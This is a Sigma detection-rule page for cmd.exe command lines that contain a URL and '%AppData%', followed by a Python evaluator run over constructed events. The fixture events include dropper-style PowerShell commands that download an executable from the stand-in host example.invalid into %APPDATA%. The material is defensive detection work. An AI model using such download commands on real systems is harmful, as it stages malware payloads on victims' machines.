Techniques
Sample rules
Command Line Execution with Suspicious URL and AppData Strings
- source: sigma
- techniques:
- t1059
- t1059.001
- t1059.003
- t1105
Description
Detects a suspicious command line execution in which the command line parameters of cmd.exe contain both a URL and an AppData string, a pattern used by several droppers (a JS/VBS stage that launches PowerShell to download a payload into %AppData%)
Detection logic
selection:
    Image|endswith: '\cmd.exe'
    CommandLine|contains|all:
        - 'http'
        - '://'
        - '%AppData%'
condition: selection
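The detection logic above run over a handful of constructed process-creation events, as an added example that is not part of the page or of the Sigma project's own tooling. It implements only the two modifiers this rule uses (`endswith`, `contains|all`) and, because Sigma string matching is case-insensitive by default, lower-cases both sides before comparing, so `%APPDATA%` in a command line still matches `'%AppData%'`. The sample events, the `example.invalid` URL and the field names (Sysmon EID 1 style) are assumptions for illustration, not real telemetry.

```python
"""Minimal evaluator for this Sigma rule's modifiers, run over constructed
process-creation events. Added example; not the page's or Sigma's own code."""

# The rule's detection block as a dict; mirrors the logic on the page.
RULE = {
    "selection": {
        "Image|endswith": "\\cmd.exe",
        "CommandLine|contains|all": ["http", "://", "%AppData%"],
    },
    "condition": "selection",
}


def field_matches(event, field_spec, expected):
    """Evaluate one `Field|modifier...` entry against an event.

    Sigma string matching is case-insensitive unless `cased` is used,
    so both the event value and the rule values are lower-cased."""
    field, *modifiers = field_spec.split("|")
    value = str(event.get(field, "")).lower()
    needles = expected if isinstance(expected, list) else [expected]
    needles = [str(n).lower() for n in needles]
    if "endswith" in modifiers:
        checks = [value.endswith(n) for n in needles]
    elif "startswith" in modifiers:
        checks = [value.startswith(n) for n in needles]
    elif "contains" in modifiers:
        checks = [n in value for n in needles]
    else:
        checks = [value == n for n in needles]
    # A list of values is an OR by default; `all` turns it into an AND.
    return all(checks) if "all" in modifiers else any(checks)


def selection_matches(event, selection):
    # Fields inside one selection map are ANDed together.
    return all(field_matches(event, spec, exp) for spec, exp in selection.items())


def rule_matches(event, rule=RULE):
    # This rule's condition is simply `selection`; richer conditions are out of scope here.
    assert rule["condition"] == "selection"
    return selection_matches(event, rule["selection"])


# Constructed sample events (assumed Sysmon EID 1 field names); not real logs.
EVENTS = [
    {   # dropper chain: wscript -> cmd.exe -> powershell downloading into %APPDATA%
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Windows\\System32\\wscript.exe",
        "CommandLine": "cmd.exe /c powershell -w hidden -c \"(New-Object Net.WebClient)"
                       ".DownloadFile('http://example.invalid/up.exe','%APPDATA%\\up.exe')\"",
    },
    {   # same payload launched by wscript without cmd.exe: Image is powershell.exe, no match
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\System32\\wscript.exe",
        "CommandLine": "powershell -c \"Invoke-WebRequest http://example.invalid/up.exe"
                       " -OutFile $env:APPDATA\\up.exe\"",
    },
    {   # benign cmd.exe usage: no URL, no AppData string
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "cmd.exe /c dir %USERPROFILE%",
    },
    {   # URL present but target is %TEMP%, so `contains|all` fails on '%AppData%'
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "cmd.exe /c curl http://example.invalid/tool.zip -o %TEMP%\\tool.zip",
    },
]


def matching_indices(events=EVENTS, rule=RULE):
    """Return the indices of events the rule fires on."""
    return [i for i, e in enumerate(events) if rule_matches(e, rule)]


if __name__ == "__main__":
    for i in matching_indices():
        print("ALERT event", i, "->", EVENTS[i]["CommandLine"])
```

The second event is worth noting in triage: the rule keys on `Image|endswith: '\cmd.exe'`, so a dropper that starts powershell.exe directly from the script host never hits it, and coverage for that variant has to come from a separate PowerShell-focused rule.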